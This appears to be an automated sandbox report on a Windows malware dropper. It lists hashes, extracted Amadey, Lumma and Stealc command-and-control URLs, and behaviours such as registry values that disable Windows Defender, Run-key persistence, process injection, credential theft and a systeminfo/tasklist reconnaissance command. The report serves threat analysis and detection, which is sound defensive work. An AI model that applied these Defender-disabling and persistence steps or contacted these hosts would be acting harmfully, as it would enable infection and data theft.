Analysis
-
max time kernel
142s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-12-2024 09:20
Static task
static1
Behavioral task
behavioral1
Sample
e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe
Resource
win7-20240903-en
General
-
Target
e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe
-
Size
3.0MB
-
MD5
d6759f231670dd66b95e2cf066d7e066
-
SHA1
08f13e2e757a55936174d6a596a6d9c8fab41831
-
SHA256
e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292
-
SHA512
eee5f50336e71511cf5380c78c302405e355ac021757dcff08fbdf76a29dd4e0cfd5bba36e74ab7ae0fe63e60adb111b5d6437ed4525d5aa90878088dac842c3
-
SSDEEP
49152:e4qIJ9fsUujMFFzGT3ODQmwC1MdD/yb9edy:e4q0fsUujMF9G7p/C1MdD/q
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://sordid-snaked.cyou/api
https://awake-weaves.cyou/api
https://wrathful-jammy.cyou/api
https://debonairnukk.xyz/api
https://diffuculttan.xyz/api
https://effecterectz.xyz/api
https://deafeninggeh.biz/api
https://immureprech.biz/api
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://drive-connect.cyou/api
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://immureprech.biz/api
https://deafeninggeh.biz/api
https://drive-connect.cyou/api
https://effecterectz.xyz/api
https://covery-mover.biz/api
https://diffuculttan.xyz/api
https://debonairnukk.xyz/api
https://wrathful-jammy.cyou/api
https://awake-weaves.cyou/api
https://sordid-snaked.cyou/api
Signatures
-
Amadey family
-
Gcleaner family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 240522a5a3.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 240522a5a3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 240522a5a3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 240522a5a3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 240522a5a3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 240522a5a3.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 71fe6c16cb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 22fcf6fdee.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 240522a5a3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 22fcf6fdee.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 22fcf6fdee.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 240522a5a3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 240522a5a3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 71fe6c16cb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 71fe6c16cb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation TdDkUco.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation pcrndBC.exe -
Drops startup file 5 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe cmd.exe -
Executes dropped EXE 17 IoCs
pid Process 2300 skotes.exe 5092 IGEaNGi.exe 2952 IGEaNGi.exe 2256 76fae8d626.exe 2008 76fae8d626.exe 4176 M5iFR20.exe 944 TdDkUco.exe 1176 pcrndBC.exe 4628 71fe6c16cb.exe 4848 c56caa7321.exe 2336 c56caa7321.exe 2356 e5779c09bf.exe 4956 22fcf6fdee.exe 5148 240522a5a3.exe 5612 skotes.exe 5832 7b63f09152.exe 5600 skotes.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 71fe6c16cb.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 22fcf6fdee.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 240522a5a3.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 240522a5a3.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 240522a5a3.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e5779c09bf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014337001\\e5779c09bf.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\22fcf6fdee.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014338001\\22fcf6fdee.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\240522a5a3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014339001\\240522a5a3.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000a000000023b8f-71.dat autoit_exe behavioral2/files/0x0011000000023bac-185.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3224 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 2380 e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe 2300 skotes.exe 4628 71fe6c16cb.exe 4956 22fcf6fdee.exe 5148 240522a5a3.exe 5612 skotes.exe 5600 skotes.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 5092 set thread context of 2952 5092 IGEaNGi.exe 93 PID 2256 set thread context of 2008 2256 76fae8d626.exe 99 PID 4848 set thread context of 2336 4848 c56caa7321.exe 148 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 5088 944 WerFault.exe 113 2960 1176 WerFault.exe 132 2072 4628 WerFault.exe 140 -
System Location Discovery: System Language Discovery 1 TTPs 56 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language e5779c09bf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c56caa7321.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22fcf6fdee.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TdDkUco.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage e5779c09bf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e5779c09bf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 240522a5a3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IGEaNGi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pcrndBC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7b63f09152.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 71fe6c16cb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 76fae8d626.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language systeminfo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IGEaNGi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language M5iFR20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c56caa7321.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 76fae8d626.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString pcrndBC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString TdDkUco.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 pcrndBC.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TdDkUco.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1676 timeout.exe 3156 timeout.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4628 systeminfo.exe -
Kills process with taskkill 5 IoCs
pid Process 1912 taskkill.exe 2924 taskkill.exe 2780 taskkill.exe 3312 taskkill.exe 4932 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings firefox.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 2380 e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe 2380 e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe 2300 skotes.exe 2300 skotes.exe 944 TdDkUco.exe 944 TdDkUco.exe 1176 pcrndBC.exe 1176 pcrndBC.exe 4628 71fe6c16cb.exe 4628 71fe6c16cb.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 4956 22fcf6fdee.exe 4956 22fcf6fdee.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 5148 240522a5a3.exe 5148 240522a5a3.exe 5148 240522a5a3.exe 5148 240522a5a3.exe 5148 240522a5a3.exe 5612 skotes.exe 5612 skotes.exe 5600 skotes.exe 5600 skotes.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 3224 tasklist.exe Token: SeDebugPrivilege 1912 taskkill.exe Token: SeDebugPrivilege 2924 taskkill.exe Token: SeDebugPrivilege 2780 taskkill.exe Token: SeDebugPrivilege 3312 taskkill.exe Token: SeDebugPrivilege 4932 taskkill.exe Token: SeDebugPrivilege 3936 firefox.exe Token: SeDebugPrivilege 3936 firefox.exe Token: SeDebugPrivilege 5148 240522a5a3.exe -
Suspicious use of FindShellTrayWindow 38 IoCs
pid Process 2380 e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe 4176 M5iFR20.exe 4176 M5iFR20.exe 4176 M5iFR20.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 2356 e5779c09bf.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe -
Suspicious use of SendNotifyMessage 36 IoCs
pid Process 4176 M5iFR20.exe 4176 M5iFR20.exe 4176 M5iFR20.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 2356 e5779c09bf.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 3936 firefox.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe 2356 e5779c09bf.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3936 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2380 wrote to memory of 2300 2380 e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe 83 PID 2380 wrote to memory of 2300 2380 e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe 83 PID 2380 wrote to memory of 2300 2380 e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe 83 PID 2300 wrote to memory of 5092 2300 skotes.exe 91 PID 2300 wrote to memory of 5092 2300 skotes.exe 91 PID 2300 wrote to memory of 5092 2300 skotes.exe 91 PID 5092 wrote to memory of 2952 5092 IGEaNGi.exe 93 PID 5092 wrote to memory of 2952 5092 IGEaNGi.exe 93 PID 5092 wrote to memory of 2952 5092 IGEaNGi.exe 93 PID 5092 wrote to memory of 2952 5092 IGEaNGi.exe 93 PID 5092 wrote to memory of 2952 5092 IGEaNGi.exe 93 PID 5092 wrote to memory of 2952 5092 IGEaNGi.exe 93 PID 5092 wrote to memory of 2952 5092 IGEaNGi.exe 93 PID 5092 wrote to memory of 2952 5092 IGEaNGi.exe 93 PID 5092 wrote to memory of 2952 5092 IGEaNGi.exe 93 PID 5092 wrote to memory of 2952 5092 IGEaNGi.exe 93 PID 2300 wrote to memory of 2256 2300 skotes.exe 97 PID 2300 wrote to memory of 2256 2300 skotes.exe 97 PID 2300 wrote to memory of 2256 2300 skotes.exe 97 PID 2256 wrote to memory of 2008 2256 76fae8d626.exe 99 PID 2256 wrote to memory of 2008 2256 76fae8d626.exe 99 PID 2256 wrote to memory of 2008 2256 76fae8d626.exe 99 PID 2256 wrote to memory of 2008 2256 76fae8d626.exe 99 PID 2256 wrote to memory of 2008 2256 76fae8d626.exe 99 PID 2256 wrote to memory of 2008 2256 76fae8d626.exe 99 PID 2256 wrote to memory of 2008 2256 76fae8d626.exe 99 PID 2256 wrote to memory of 2008 2256 76fae8d626.exe 99 PID 2256 wrote to memory of 2008 2256 76fae8d626.exe 99 PID 2256 wrote to memory of 2008 2256 76fae8d626.exe 99 PID 2300 wrote to memory of 4176 2300 skotes.exe 105 PID 2300 wrote to memory of 4176 2300 skotes.exe 105 PID 2300 wrote to memory of 4176 2300 skotes.exe 105 PID 4176 wrote to memory of 4620 4176 M5iFR20.exe 106 PID 4176 wrote to memory of 4620 4176 M5iFR20.exe 106 PID 4176 wrote to memory of 4620 4176 M5iFR20.exe 106 PID 4620 wrote to memory of 4628 4620 cmd.exe 108 PID 4620 wrote to memory of 4628 4620 cmd.exe 108 PID 4620 wrote to memory of 4628 4620 cmd.exe 108 PID 2300 wrote to memory of 944 2300 skotes.exe 113 PID 2300 wrote to memory of 944 2300 skotes.exe 113 PID 2300 wrote to memory of 944 2300 skotes.exe 113 PID 4620 wrote to memory of 3224 4620 cmd.exe 115 PID 4620 wrote to memory of 3224 4620 cmd.exe 115 PID 4620 wrote to memory of 3224 4620 cmd.exe 115 PID 4176 wrote to memory of 4128 4176 M5iFR20.exe 116 PID 4176 wrote to memory of 4128 4176 M5iFR20.exe 116 PID 4176 wrote to memory of 4128 4176 M5iFR20.exe 116 PID 4176 wrote to memory of 3384 4176 M5iFR20.exe 119 PID 4176 wrote to memory of 3384 4176 M5iFR20.exe 119 PID 4176 wrote to memory of 3384 4176 M5iFR20.exe 119 PID 4176 wrote to memory of 2144 4176 M5iFR20.exe 122 PID 4176 wrote to memory of 2144 4176 M5iFR20.exe 122 PID 4176 wrote to memory of 2144 4176 M5iFR20.exe 122 PID 4176 wrote to memory of 5092 4176 M5iFR20.exe 123 PID 4176 wrote to memory of 5092 4176 M5iFR20.exe 123 PID 4176 wrote to memory of 5092 4176 M5iFR20.exe 123 PID 4176 wrote to memory of 2324 4176 M5iFR20.exe 127 PID 4176 wrote to memory of 2324 4176 M5iFR20.exe 127 PID 4176 wrote to memory of 2324 4176 M5iFR20.exe 127 PID 4176 wrote to memory of 3864 4176 M5iFR20.exe 129 PID 4176 wrote to memory of 3864 4176 M5iFR20.exe 129 PID 4176 wrote to memory of 3864 4176 M5iFR20.exe 129 PID 2300 wrote to memory of 1176 2300 skotes.exe 132 PID 2300 wrote to memory of 1176 2300 skotes.exe 132 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe"C:\Users\Admin\AppData\Local\Temp\e5634ff64a40c5a9a0291d367ccdbfa25346f8163e4023134240e9b0d61f1292.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Users\Admin\AppData\Local\Temp\1014031001\IGEaNGi.exe"C:\Users\Admin\AppData\Local\Temp\1014031001\IGEaNGi.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Users\Admin\AppData\Local\Temp\1014031001\IGEaNGi.exe"C:\Users\Admin\AppData\Local\Temp\1014031001\IGEaNGi.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2952
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014060001\76fae8d626.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\76fae8d626.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Users\Admin\AppData\Local\Temp\1014060001\76fae8d626.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\76fae8d626.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe"C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Windows\SysWOW64\cmd.execmd /c systeminfo > tmp.txt && tasklist >> tmp.txt4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo5⤵
- System Location Discovery: System Language Discovery
- Gathers system information
PID:4628
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3224
-
-
-
